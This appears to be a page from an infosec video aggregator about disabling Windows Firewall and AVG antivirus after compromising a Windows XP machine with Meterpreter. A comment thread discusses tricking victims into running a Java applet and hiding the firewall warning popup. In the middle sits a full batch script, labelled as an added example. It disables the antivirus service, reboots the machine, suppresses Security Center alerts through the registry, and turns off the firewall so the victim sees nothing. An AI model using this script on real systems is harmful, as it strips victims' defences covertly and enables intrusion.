Description: How to deactivate Windows Firewall and AV software.
Tags: Post Exploitation, Windows XP, metasploit, firewall, AVG
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source: http://www.youtube.com/watch?v=8MFM2b38xGQ
Nice. It's a pity that you had to simulate the victim accepting the certificate a number of times though. I can understand their clicking once or *maybe* twice, but I would have thought they would become suspicious on the third or subsequent occasion!
I also saw that, when you disabled WFW, there was a popup on the victim's screen. I'm fairly sure I've seen a trick recently (it may have been here on ST) where the popup was disabled so, when the WFW was disabled via the netsh ... command, there was no indication of anything strange happening. I'll see if I can find the clip, unless someone else beats me to it!
Hey Ignatius:
First, thank you for your comment. I'm always interested in constructive criticism :)
@topic:
Yes, you are right, in this case the victim at least has to click or use the Java applet twice... The first time is needed to get a Meterpreter session to deactivate the AVG services so they do not restart when the computer reboots... Unfortunately I'm not able to shut down the running AVG processes/services because they are locked; that's why I had to reboot the system... The disadvantage is that (as you already said) we have to gain a new Meterpreter session on the victim's machine to install the backdoor after AVG is disabled. In a real-world example it should be more practicable... But this wasn't the topic of the video. The topic was to deactivate the firewall and AVG. Owning the system and getting a Meterpreter session was only a means to an end in this video.
Nevertheless, if you know a more practicable way, then show me :)
It would be great if you could show me a video or other instructions on how to deactivate the firewall via netsh without the suspicious WFW popup :)
Thanks for your reply again!
Greets,
3lL060
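The two-session sequence 3lL060 describes above (mark the AV service disabled in the first session, reboot, then disable the firewall in the second), together with the Security Center balloon Ignatius mentions, as commands typed into a cmd.exe shell obtained from Meterpreter on Windows XP SP2/SP3. This is an added example, not code from the video or from either commenter. The AVG service name avg9wd is an assumption (confirm it with sc query first); the Security Center values are the standard XP SP2 "DisableNotify" keys, and whether the .rb script mentioned later in the thread uses them is not stated on this page.

```batch
@echo off
REM Added example (not from the video or the thread). Run inside the Meterpreter "shell".
REM Usage:  disable.bat         first session: mark the AV service disabled, then reboot
REM         disable.bat phase2  second session, after reboot: hide the balloon, disable WFW
if /i "%1"=="phase2" goto phase2

REM ---- Phase 1 (first session) ----
REM Assumed service name; confirm it before relying on it:
REM   sc query state= all | findstr /i avg
REM   tasklist /svc | findstr /i avg
set AVSVC=avg9wd

REM A running AV service is usually locked and cannot be stopped, so only its start type
REM is changed here (note the mandatory space after "start="); the reboot removes it.
sc config %AVSVC% start= disabled
sc qc %AVSVC% | find "START_TYPE"
REM expected line:  START_TYPE : 4 DISABLED

REM Reboot; a new Meterpreter session is needed afterwards (the second applet click).
shutdown -r -t 0
goto :eof

:phase2
REM ---- Phase 2 (second session, AV no longer running) ----
REM XP SP2+ Security Center: a REG_DWORD of 1 suppresses the "firewall is off" / "no AV"
REM balloon, so the netsh change below produces no popup on the victim's desktop.
reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify  /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 1 /f

REM XP "netsh firewall" syntax; Vista and Windows 7 use "netsh advfirewall" instead.
netsh firewall set opmode mode=disable

REM Verify: "Operational mode = Disable" should appear for the current profile.
netsh firewall show opmode
```

Whether the balloon really stays away should be verified on a test VM before use: Security Center polls the firewall state on its own schedule, so check the tray a minute after the netsh command rather than immediately.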
I found the video by zerocool394 and here's the link: http://www.securitytube.net/video/2696
He demonstrated a .rb script that did the business on Windows XP, and he mentioned that it's more complicated on Vista and Windows 7. I know he's doing a series dealing with SET, and he may wait until he's completed that series before posting a more advanced video which explains how to disable the popup on Vista and Windows 7.
Thank you Ignatius :)